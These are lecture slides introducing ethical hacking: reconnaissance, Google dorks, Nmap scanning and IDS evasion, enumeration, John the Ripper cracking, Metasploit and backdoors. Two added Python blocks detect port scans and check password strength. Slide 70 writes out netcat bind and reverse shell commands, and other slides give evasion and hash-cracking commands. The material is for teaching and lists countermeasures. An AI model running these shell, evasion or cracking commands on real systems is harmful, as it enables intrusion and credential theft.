
1 Dr. Igor Santos

2  What is Ethical Hacking?
 Phases
 Information Gathering
 Network Mapping & Scanning
 Password Attacks
 Service Enumeration
 Vulnerabilities Identification & Exploitation

3 What is Ethical Hacking?

4  A method to evaluate the security of a system or a network of systems by simulating an intruder's attack
 It shows the actual impact of a vulnerability through controlled tests
 It searches for unknown vulnerabilities

5  Information level
 White Box
 Black Box
 Social Engineering?
 Physical Security?
 Dangerous Tests?
 Exploits
 DoS
 …

6 Information Gathering

7  Gather information about the target before the attack
 Without (too much) contact
 As much information as possible
 The information can be very valuable later on
 More information = higher probability of success in the attack

8  Information we search for:
 Names and/or positions of workers
 E-mail addresses
 User names
 Public addresses, domains or URLs
 Software and technologies in use
 Internal addresses or URLs
 Internal paths
 Data about the system configuration

9  Client and supplier names
 Physical location
 Telephone number
 …
 Iterative process
 When information is found, new searches are performed

10  Sources
 Search engines
 DNS servers
 Whois servers
 Metadata
 Social networks
 P2P networks
 …

11  Passive methods
 The target is not contacted directly
 ▪ Search engines
 ▪ Whois
 ▪ …
 Active methods
 They leave some trace on the target
 ▪ DNS zone transfer
 ▪ Web site mirroring
 ▪ …

12  Internet service registration (whois)
 Information about the IP record and its maintainer
 Search engines
 Gather public information from company and worker web sites

13  DNS queries
 Identification of hosts by DNS querying
 Web site analysis
 Intentionally published information that may pose a security risk

14  New sources!!!
 Social networks
 Metadata
 P2P networks
 Job search websites

15  Google Hacking: searching Google for sensitive information, usually with malicious goals
 Johnny Long
 Google Hacking For Penetration Testers
 http://www.hackersforcharity.org/ghdb/
 ▪ Not maintained
 http://www.exploit-db.com/google-dorks/
 ▪ Continuation!!! (9 Nov. 2010)
 Cheat sheet: http://www.sans.org/mentor/GoogleCheatSheet.pdf

16  What to look for?
 Vulnerable applications (e.g. inurl:eStore/index.cgi?)
 Error messages (e.g. “Warning: mysql_query()” “invalid query”)
 Files with sensitive information (e.g. filetype:sql “insert into”)
 Websites with private reports (e.g. intitle:”Nessus Scan Report”)
 Web server versions (e.g. “Microsoft-IIS/* server at”, intitle:index.of)

17  http://www.shodanhq.com/
 A “different” search engine
 It finds systems by performing searches based on the banner responses
 ▪ Computer search engine
 Filters: http://www.shodanhq.com/help/filters
 Examples:
 ▪ net:130.206.139.0/24
 ▪ port:22 country:ES

18  Netcraft (http://news.netcraft.com)
 Given a domain, it shows the following information
 ▪ OS version
 ▪ Web server version
 ▪ Uptime

19  Countermeasures
 Properly configure the “robots.txt” file
 ▪ This file tells search engines what they must NOT index
 Periodically audit the web site with these techniques to check that there is no access to sensitive information

20  Who has a profile on Facebook or LinkedIn?
 Do we know how to handle privacy in social networks?
 Social engineering
 Create a fake profile in order to obtain access to private profiles = lots of information!
 Social network search engines
 ▪ http://www.123people.com/
 ▪ http://www.pipl.com/

21  Countermeasures
 Limit the presence in social networks
 Don't publish too much
 Don't publish automatically
 Don't accept every friendship request (we may not be the final victim but an attack vector)

22  Hidden information within a document
 Author
 Application used
 Date of creation
 Camera model (images)
 E-mail addresses
 …
 It adds to the information visible in the document

23  A tool that started out as a metadata extractor and analyzer and is now more than that:
 Document panel: searches several types of documents in Google, Bing and Exalead
 DNS Search panel: uses different techniques to obtain more domain names
 Countermeasures: Metashield Protector
 It cleans the metadata from documents

24 Network Mapping & Scanning

25  Several techniques
 Host discovery
 Port scanning
 IDS (Intrusion Detection System) evasion
 Service and OS identification (fingerprinting)

26  Nmap
 Tool for network exploration and security auditing
 nmap [.][ ] { }
 Options
 ▪ Scan type: -sS, -sX, -sU, …
 ▪ -p : ports to scan (separated by commas, or “-” for a range; to scan all of them, -p 0-65535)

27  Zenmap
 Front-end for nmap
 It draws a network map with the results
 Predefined scans

28  Manual: http://nmap.org/man/es/man-briefoptions.html
 Cheat sheet: http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf
 Book: http://nmap.org/book/

29  Identify online systems
 First step of network mapping
 Classic method using ping
 ICMP echo request
 Alive systems respond with an ICMP echo reply
 It is also possible to send TCP packets and wait for the response of the online hosts
 ARP ping in local networks

30  Nmap ping (-sP)
 ICMP echo request & ICMP timestamp request
 TCP ACK packet to port 80
 TCP SYN packet to port 443
 Example: nmap -sP 192.168.1.1

31  One of the most widespread hacking techniques
 Nmap in Hollywood: http://nmap.org/movies.html
 A computer runs several services that listen on TCP/UDP ports
 By scanning, we can locate the open ports

32  TCP Connect scan
 A TCP connection is established with the destination port (Three-Way Handshake)
 A very reliable method to determine the port state
 Simple and easy to detect
 ▪ Generates too much noise
 nmap -sT -p

33 Open port

34 Closed port

35 Filtered port

36  SYN scan
 If a listening port is found, the full connection is not established
 ▪ An RST is sent to tear it down
 Because the Three-Way Handshake is not completed, a lot of systems don't log the connection attempt
 An IDS can easily detect it
 Quick and reliable
 nmap -sS -p

37 Open port

38 Closed port

39 Filtered port

40  UDP is a connectionless protocol
 Closed ports reply with an “ICMP destination unreachable” packet
 If ICMP traffic is filtered, no responses are received for the closed ports
 The port state cannot be determined conclusively
 nmap -sU -p

41 Open/Filtered port

42 Closed port

43  Techniques to avoid IDS/IPS
 Use of fragmented packets
 ▪ Distribution of an IP packet across several data blocks
 nmap -sS -f -p
 Spoofing of origin IPs to emulate multiple attackers
 ▪ Hiding our own (attacker) IP
 nmap -sS -D -p

44  Service fingerprinting
 Identification of the service listening on a TCP/UDP port
 nmap -sV -p
 OS fingerprinting
 Identification of the operating system
 nmap -O

45  Disable unnecessary services
 Close ports
 Firewall / IDS / IPS
 ICMP traffic filtering
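The countermeasures slide above lists a firewall and an IDS; as an added example that is not part of the presentation, the following Python flags the pattern the scans of slides 32-43 leave in firewall logs: one source touching many distinct ports within a short window. The log line layout and the sample lines are constructed assumptions; a SYN scan (-sS) still shows up here even though the target itself never records a completed connection.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed firewall log lines (not from the presentation): one host probing
# ten ports in a few seconds, plus one normal client.
SAMPLE_LOG = """\
2010-11-09 10:00:01 DROP TCP 192.168.1.50:40001 -> 192.168.1.1:21 SYN
2010-11-09 10:00:01 DROP TCP 192.168.1.50:40002 -> 192.168.1.1:22 SYN
2010-11-09 10:00:01 DROP TCP 192.168.1.50:40003 -> 192.168.1.1:23 SYN
2010-11-09 10:00:02 DROP TCP 192.168.1.50:40004 -> 192.168.1.1:25 SYN
2010-11-09 10:00:02 DROP TCP 192.168.1.50:40005 -> 192.168.1.1:80 SYN
2010-11-09 10:00:02 DROP TCP 192.168.1.50:40006 -> 192.168.1.1:110 SYN
2010-11-09 10:00:03 DROP TCP 192.168.1.50:40007 -> 192.168.1.1:443 SYN
2010-11-09 10:00:03 DROP TCP 192.168.1.50:40008 -> 192.168.1.1:445 SYN
2010-11-09 10:00:03 DROP TCP 192.168.1.50:40009 -> 192.168.1.1:3389 SYN
2010-11-09 10:00:04 DROP TCP 192.168.1.50:40010 -> 192.168.1.1:8080 SYN
2010-11-09 10:05:00 ALLOW TCP 192.168.1.77:51001 -> 192.168.1.1:443 SYN
"""

# Assumed layout: "<date> <time> <action> <proto> <src>:<sport> -> <dst>:<dport> <flags>"
LINE = re.compile(
    r"(?P<ts>\S+ \S+) (?P<action>\w+) (?P<proto>\w+) "
    r"(?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<dport>\d+)"
)


def detect_scans(log_text, max_ports=8, window_s=60):
    """Return {source: sorted distinct ports} for every source that hit more
    than max_ports distinct destination ports within window_s seconds."""
    events = defaultdict(list)  # src -> [(timestamp, dport)]
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # not a firewall event line
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        events[m["src"]].append((ts, int(m["dport"])))

    suspects = {}
    window = timedelta(seconds=window_s)
    for src, hits in events.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            # Distinct ports probed in the window that opens at this hit.
            ports = {p for t, p in hits[i:] if t - start <= window}
            if len(ports) > max_ports:
                suspects[src] = sorted(ports)
                break
    return suspects
```

Decoy scans (-D on slide 43) spread the probes over spoofed sources, so the same count should also be kept per destination host, where they add up again.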

46 Enumeration

47  Get information through a network service
 What information?
 System user names
 E-mail addresses
 Other systems…

48  Services
 FTP: anonymous / ftp-user-enum
 TFTP: without authentication!
 SMTP: VRFY and EXPN commands → smtpenum
 DNS: direct/reverse lookup and zone transfer
 HTTP: banner grabbing
 RPC: edump, rpcdump, rpcinfo
 NETBIOS: samrdump
 SNMP: snmpwalk, snmpcheck
 LDAP: brute force by means of the Guest user

49  Keep the services updated
 Disable unnecessary services

50 Password Attacks

51  Some or all of the data needed to authenticate is unknown
 User (if the Information Gathering phase has been done correctly, we will have several system users)
 Password
 The password file is known, but it is encrypted
 Words are tested until the correct one is found

52  Systems store a password hash
 They do not store users' passwords in the clear
 One-way encryption function
 It cannot be decrypted
 ▪ http://en.wikipedia.org/wiki/Cryptographic_hash_function

53  During a pentest we will collect password hashes
 Bad configurations
 Successful intrusion
 With administrative permissions it is possible to dump the password hashes of the system users
 Windows -> SAM
 Unix -> /etc/passwd, /etc/shadow

54  Dictionary
 It is based on a list of user names or passwords
 Common words
 Terms related to the audited target
 Try until the right one is found
 It should be on the list!
 Success depends on how good and/or extensive the dictionary is
 /pentest/passwords/wordlists

55  Hybrid
 It uses a dictionary, but variations are also introduced
 Examples
 Try dictionary words in lowercase and uppercase
 A is changed to 4, S to 5, E to 3, ...

56  Brute force
 Usernames or passwords are generated within a length range and from a given character set
 ▪ E.g. max 8 characters [A-Za-z]

57  Password cracking tool
 Able to break several algorithms
 DES
 MD5
 SHA-1
 LM (LAN Manager)
 ...
 A session can be saved and resumed later

58  Single mode
 Quick test
 Difficult to succeed
 It uses typical passwords and some variations
 john --single

59  Wordlist mode
 It tests with a dictionary file
 Quick
 Hybrid attack: --rules
 john --wordlist=
 Dictionaries: /pentest/passwords/wordlists/

60  Incremental mode
 It tries all possible password combinations (brute force)
 ▪ Only letters (--incremental:alpha)
 ▪ Only numbers (--incremental:digits)
 ▪ Letters, numbers and some special characters (--incremental:lanman)
 ▪ All characters (--incremental:all)
 john --incremental:[mode]

61  Show cracked hashes
 john --show /etc/shadow
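As an added example (not code from the presentation), the following Python turns the three attack classes of slides 54-60 into a password-policy check: it asks whether a given password would fall to the plain dictionary, to the hybrid rules (case changes plus the A->4, S->5, E->3 substitutions of slide 55) or only to brute force, and sizes the brute-force keyspace of slide 56. The wordlist is a constructed stand-in for the /pentest/passwords/wordlists/ files.

```python
import re

# Constructed mini wordlist standing in for /pentest/passwords/wordlists/
# (assumption: a real check loads the full files).
WORDLIST = {"password", "secret", "welcome", "summer", "admin"}

# Inverse of the hybrid substitutions on the slide (A->4, S->5, E->3) plus the
# other common ones rule-based crackers apply (O->0, I->1, A->@, S->$).
UNLEET = str.maketrans({"4": "a", "5": "s", "3": "e", "0": "o",
                        "1": "i", "@": "a", "$": "s"})


def hybrid_candidates(password):
    """Base words a rule-based (hybrid) attack would derive this password from."""
    lowered = password.lower()
    # Rules also prepend/append digits, years and symbols: strip them to expose the root.
    stripped = re.sub(r"^[^a-z]+|[^a-z]+$", "", lowered)
    return {lowered.translate(UNLEET), stripped.translate(UNLEET)}


def classify(password, wordlist=WORDLIST):
    """Which of the slide's attack classes would find this password first."""
    if password in wordlist:
        return "dictionary"
    if any(c in wordlist for c in hybrid_candidates(password)):
        return "hybrid"
    return "brute-force"


def keyspace(charset_size, max_len):
    """Candidates an incremental (brute-force) run must try for lengths 1..max_len."""
    return sum(charset_size ** k for k in range(1, max_len + 1))


if __name__ == "__main__":
    for pw in ["password", "P4ssw0rd!", "Welcome2010", "xK9#qL2v"]:
        print(f"{pw}: {classify(pw)}")
    # The slide's brute-force example: max 8 characters from [A-Za-z]
    print("keyspace(52, 8) =", keyspace(52, 8))
```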

62  Shoulder surfing
 Social engineering
 Sniffing
 Capture the session logins
 Physical access
 Bypass -> Kon-Boot
 Password cracking: Ophcrack live CD (rainbow tables)

63 Vulnerabilities Identification & Exploitation

64  Terminology
 Vulnerability
 Exploit (client-side, server-side, …)
 0-day exploit
 Payload
 CVE (Common Vulnerabilities and Exposures): http://cve.mitre.org/

65  Lots of vulnerability types:
 Configuration (not design)
 Input validation
 Directory traversal
 Command injection
 SQL injection
 Cross-site scripting (XSS)
 Buffer overflow
 …

66  Vulnerability search
 Security Focus
 ▪ http://www.securityfocus.com/vulnerabilities
 National Vulnerability Database
 ▪ http://web.nvd.nist.gov/view/vuln/search
 CERT
 ▪ http://cert.inteco.es/vulnSearch/Current_News/Vulnerabilities_1/vulnerability_search/?postAction=getVulns
 Microsoft Security Bulletins
 ▪ http://www.microsoft.com/spain/technet/security/bulletin/ms10-oct.mspx
 Scanners: Secunia, Nessus, etc.

67  Exploits search
 Exploit Database
 ▪ Milw0rm continuation
 ▪ http://www.exploit-db.com/
 Others
 ▪ http://www.securiteam.com/exploits
 ▪ http://securityvulns.com/exploits
 ▪ http://www.web-hack.ru/exploit
 ▪ http://tarantula.by.ru/localroot

68  Metasploit
 Framework for vulnerability exploitation
 It helps in the development of new exploits
 It allows defining
 ▪ Which exploit is going to be used
 ▪ Which payload is going to be launched
 ▪ Meterpreter: advanced payload without disk access (DLL injection) → less forensic evidence
 ▪ How it is going to be encoded (avoiding IDS, etc.)

69  Maintaining the access: backdoors
 Tiny Shell: Unix backdoor
 Hydrogen: backdoor from Immunitysec
 ▪ It includes robust encryption and traffic hiding
 Radmin: Windows backdoor
 ▪ A remote-desktop-like connection. Very easy to use and with a lot of functions

70  Netcat: it can be used as a backdoor
 ▪ Victim (server): nc -lp 4444 -e cmd.exe
 ▪ Attacker (client): nc -vv 4444
 ▪ Also as a “reverse shell”:
 ▪ Attacker (client): nc -vvlp 4444
 ▪ Victim (server): nc -vv 4444 -e cmd.exe

71  Images
 RTVE
 http://www.flickr.com/photos/anonymous9000/2663311366
 The Matrix, Warner Bros.
 http://www.flickr.com/photos/venosdale/4412225367
 http://www.flickr.com/photos/melancon/2283719035

